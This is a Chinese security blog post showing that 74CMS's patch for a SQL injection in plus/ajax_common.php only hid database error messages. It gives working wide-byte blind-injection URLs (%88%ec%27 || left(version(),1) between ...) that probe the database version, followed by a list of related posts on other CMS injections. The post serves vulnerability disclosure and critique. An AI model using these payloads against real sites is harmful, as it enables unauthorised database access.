骑士cms最新全局SQL注入(官方奇葩修复案例)

最新推荐文章于 2024-02-06 20:39:57 发布
最新推荐文章于 2024-02-06 20:39:57 发布
阅读量2.1k 收藏
点赞数
分类专栏: thinkphp 文章标签: 骑士cms

这个漏洞,我们看看骑士怎么修复的

http://wwwcto2uploudpic/Article/201412/359995.html

首先试试带入单引号,用宽字节试试,可以看到显示数据库出错

 






看看数据库怎么带入的吧



可以看到出错了,单引号被带入sql语句了




居然还可以注入,没有过滤



找到/include/mysql.class.php中最下面

function dbshow($err)

	{

    	if($err){

    		$info = "Error:".$err;			

    	}else{

    		$info = "Errno:".$this->errno()." Error:".$this->error();

    	}

    	//exit($info);

        exit("数据库错误,请联系网站管理员!");

    }



只是把显错换成了数据库错误,请联系网站管理员!

这种修复方式我也是醉了,虽然是改了显错,但是我们的语句还是可以执行的,可以用盲注


http://127.0.0.1/upload1/plus/ajax_common.php?act=hotword&query=%88%ec%27%20||%20left(version(),1)%20between%200%20and%2050--%20a

这样猜解数据库版本第一位是0到5之间,返回内容


http://127.0.0.1/upload1/plus/ajax_common.php?act=hotword&query=%88%ec%27%20||%20left(version(),1)%20between%200%20and%2040--%20a


这样猜解数据库版本第一位是0到4之间,返回空白

因为mysql是5.0以上的版本

解决方案:

过滤

koothon
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
74CMS(骑士CMS) 存在SQL注入漏洞(CNVD-2021-43389)
nnn2188185的博客
03-19 1237
74CMS是一款基于ThinkPHP框架二次开发的人才招聘系统。 74CMS 3.2.0版本存在SQL注入漏洞。攻击者利用该漏洞可通过plus/ajax_street.php的x参数注入SQL语句。
骑士5.0.1 CMS +前台存在SQL注入
04-25
骑士人才系统是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才招聘系统。由太原迅易科技有限公司于2009年正式推出。为个人求职和企业招聘提供信息化解决方案, 骑士人才系统具备执行效率高、模板切换自由、后台管理功能灵活、模块功能强大等特点,自上线以来一直是职场人士、企业HR青睐的求职招聘平台。经过7年的发展,骑士人才系统已成国内人才系统行业的排头兵。系统应用涉及政府、企业、科研教育和媒体等行业领域,用户已覆盖国内所有省份和地区。 2016年全新推出骑士人才系统基础版,全新的“平台+插件”体系,打造用户“DIY”个性化功能定制,为众多地方门户、行业人才提供一个专业、稳定、方便的网络招聘管理平台,致力发展成为引领市场风向的优质高效的招聘软件
骑士PHP人才系统(74CMS)源代码 v3.0
11-09
 骑士CMS-PHP人才系统源码,功能模块专业,系统以招聘求职模块与诸多实用辅助模块组成,专业、强大、实用、易用。在布局上科学严谨,给用户赏心悦目的视觉感受,而且程序开源免费、安全稳定,拥有WEB2.0新技术使系统拥有一流的用户体验。
SQL注入讲解-BeesCMS系统漏洞分析溯源
Ryongao
02-06 687
本文章仅限于网络安全教学,严禁用于非法途径。若有人因此作出危害网络安全行为后果自负,与本人无关。
cmseasy最新SQL注入漏洞+Bypass 360webscan方法
离别歌
04-11 838
先下载最新版(2015-03-18):http://ftp.cmseasy.cn/CmsEasy5.x/CmsEasy_5.5_UTF-8_20150318.zip 经过神器比对,发现最...
【某CMS漏洞SQL注入漏洞分析
HBohan的博客
04-27 1468
前言 这个CMS非常适合入门代码审计的人去学习,因为代码简单且漏洞成因经典,对一些新手有学习价值, 前台注入 从入口开始:/semcms/Templete/default/Include/index.php [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-xhTdHBVn-1651041211358)(https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/490ca1b2038f48148c14ac62455278ef~tplv-k
SQL注入
heiseweiye的博客
10-05 445
一、MySQL注入 1. 常用信息查询 常用信息: 当前数据库名称:database() 当前用户:user() current_user() system_user() 当前数据库版本号:@@version version() 系统类型:@@version_compile_os 错误日志存储位置:@@log_error 数据库存储位置:@@datadir 系统数据库: 所有数据库:SELECT ...
骑士CMS SQL注入漏洞
收集盒 Book box
07-02 2380
影响版本: 通杀 程序介绍:  骑士CMS人才系统,PHP人才招聘程序 (www.74cms.com/) 漏洞文件: ajax_output.php预览源代码打印关于1 $category_id=trim($_GET['category_id']);  2  3 if (($category_id+0)>0 && intval($category_id)==$cate
渗透测试php过程,利用骑士cms的一次纠结的渗透测试过程(两个潜在
weixin_39772352的博客
04-09 471
今天下载了骑士cms最新版本,由于好久以前一个哥们发了一个后台拿shell的漏洞,还有别人发的一个sql注入漏洞,一个有意思的渗透测试过程就从这两个地方开始了,成功的拿下了某大型人才网站的服务器,过程算比较艰辛吧,由于附带了对其实cms漏洞重新分析,并且加入了自己新的利用方法,所以这里提交到了通用漏洞第一步 我们分析一个老的sql注入问题:文件job/plus/ajax_common.php...
sql注入pythonpoco_骑士CMS后台SQL注入 | CN-SEC 中文网
weixin_39753213的博客
02-11 179
摘要漏洞文件:admin/admin_feedback.php代码82行:跟下get_report_list:$_GET[‘reporttype’]漏洞文件:admin/admin_feedback.php代码82行:if (!empty($_GET['reporttype'])) { $wheresql=empty($wheres...
74CMS 3.0 SQL注入漏洞后台.docx
07-07
74CMS 3.0 SQL注入漏洞后台演示,利用 sqlmap与burpsuit注入,需具备php基础
极致CMS(以下简称_JIZHICMS)的一次审计-SQL注入+储存行XSS+逻辑漏洞.pdf
03-22
极致CMS(以下简称_JIZHICMS)的一次审计-SQL注入+储存行XSS+逻辑漏洞.pdf
CSZ CMS 1.2.X sql注入漏洞
09-07
# (CVE-2019-13086)CSZ CMS 1.2.Xsql注入漏洞 ## 一、漏洞简介 CSZ CMS是一套基于PHP的开源内容管理系统CMS)。 CSZ CMS 1.2.X版本(2019-06-20之前)中的core/MY_Security.php文件存在SQL注入漏洞。该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。 ## 二、漏洞影响 CSZ CMS 1.2.X版本(2019-06-20之前) ## 三、利用过程 具体见**CVE-2019-13086.py**,利用时替换localhost即可 --- # CSZ CMS 1.2.X 储存型 xss ## 一、漏洞简介 拥有访问私有消息的未授权用户可以向管理面板嵌入Javascript代码。 ## **二、漏洞影响** CSZ CMS 1.2.X ## 三、利用过程
骑士cms3.7商业版
01-22
绝对可用的骑士cms3.7商业版,修复多数漏洞,猎头系统支持微信公总号
gamblingmaster2020#0day-1#74cms v5.0.1前台sql注入1
07-25
一、漏洞简介 二、漏洞影响 三、复现过程
框架搭建内容合成的描述
04-19
框架搭建内容合成的描述
【Godot4自学手册】第三十八节给游戏添加音效
最新发布
04-19
【Godot4自学手册】第三十八节给游戏添加音效
人工智能BBSO算法,MATLAB实现,很基本的人工智能算法,里面有很多源程序
04-19
人工智能BBSO算法,MATLAB实现,很基本的人工智能算法,里面有很多源程序 (Artificial intelligence bbso) 文件列表: BBSO\alea.m (99, 2013-11-02) BBSO\alea_normal.m (532, 2013-11-02) BBSO\alea_sphere.m (483, 2013-11-02) BBSO\BBSO.m (5647, 2015-05-03) BBSO\BSO.asv (3521, 2013-11-02) BBSO\calef.m (375, 2014-02-08) BBSO\cauchy.txt (1282, 2013-11-02) BBSO\cauchy.zip (9607, 2013-11-02) BBSO\cauchycdf.m (1225, 2013-11-02) BBSO\cauchyfit.m (5565, 2013-11-02) BBSO\cauchyinv.m (1379, 2013-11-02) BBSO\cauchypdf.m (1221, 2013-11-02) BBSO\cauchyr
joomla cms 3.2-3.44 前台sql注入结果分析
06-08
对于 Joomla CMS 3.2-3.4.4 的前台 SQL 注入漏洞,攻击者可以通过构造恶意的 SQL 语句来绕过应用程序的身份验证和访问控制,从而获取敏感信息或者修改、删除、添加数据。 攻击者可以利用 SQL 注入漏洞执行各种恶意操作,例如: - 获取敏感信息:攻击者可以通过构造 SQL 注入语句来获取敏感信息,如用户凭证、信用卡信息等。 - 篡改数据:攻击者可以通过 SQL 注入来修改数据库中的数据,如修改账户余额、删除重要数据等。 - 注入恶意代码:攻击者可以通过 SQL 注入来注入恶意代码,如 XSS 攻击等。 为了避免 SQL 注入漏洞的风险,应该采取以下措施: - 对输入数据进行有效的过滤和验证,避免恶意数据的注入。 - 使用参数化查询代替字符串拼接的方式构造 SQL 语句,避免 SQL 注入攻击。 - 最小化数据库用户的权限,避免攻击者通过 SQL 注入攻击获取敏感信息或者篡改数据。 - 及时更新应用程序和数据库系统的补丁,避免已知的漏洞被攻击者利用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值